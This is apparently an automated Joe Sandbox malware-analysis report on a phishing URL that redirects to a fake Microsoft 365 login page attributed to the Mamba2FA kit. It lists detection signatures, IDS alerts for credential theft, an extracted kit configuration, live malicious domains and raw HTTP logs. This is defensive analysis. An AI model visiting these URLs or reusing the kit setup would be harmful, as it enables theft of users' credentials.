Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/

Overview

General Information

Sample URL:https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
Analysis ID:1543809
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2112,i,16333872825973272268,8149519948773328679,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "WDVFazA=", "uid": "USER16102024U11101647"}
SourceRuleDescriptionAuthorStrings
2.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    2.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.2.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-28T14:03:18.512814+010020563161Successful Credential Theft Detected192.168.2.44975450.87.179.240443TCP
          2024-10-28T14:03:19.831270+010020563161Successful Credential Theft Detected192.168.2.44976150.87.179.240443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-28T14:03:17.378347+010020566432Possible Social Engineering Attempted192.168.2.44975250.87.179.240443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: 0.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "WDVFazA=", "uid": "USER16102024U11101647"}

          Phishing

          barindex
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NLLM: Score: 7 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'skinature.com' does not match the legitimate domain 'microsoft.com'., There is no known association between 'Microsoft' and the domain 'skinature.com'., The URL does not contain any recognizable elements related to Microsoft., The input fields 'Email, phone or Skype' are commonly used in phishing attempts targeting Microsoft accounts. DOM: 2.1.pages.csv
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NLLM: Score: 7 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'skinature.com' does not match the legitimate domain 'microsoft.com'., There is no known association between 'Microsoft' and the domain 'skinature.com'., The URL 'skinature.com' does not contain any recognizable elements related to Microsoft., The input fields 'Email, phone or Skype' are commonly used in phishing attempts targeting Microsoft accounts. DOM: 2.2.pages.csv
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NMatcher: Template: microsoft matched
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NMatcher: Template: microsoft matched
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Number of links: 0
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/HTTP Parser: Base64 decoded: sv=o365_1_nom&rand=WDVFazA=&uid=USER16102024U11101647
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Forgot password?
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: <input type="password" .../> found
          Source: https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/HTTP Parser: No favicon
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No favicon
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No favicon
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49807 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49754 -> 50.87.179.240:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49761 -> 50.87.179.240:443
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49752 -> 50.87.179.240:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/ HTTP/1.1Host: fce0.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /securereader/Image?c=lock&b=1&rnd=0.00823190732671009 HTTP/1.1Host: secmail.bankofamerica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fce0.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fce0.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /securereader/Image?c=lock&b=1&rnd=0.00823190732671009 HTTP/1.1Host: secmail.bankofamerica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: skinature.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: skinature.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://skinature.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: skinature.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://skinature.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
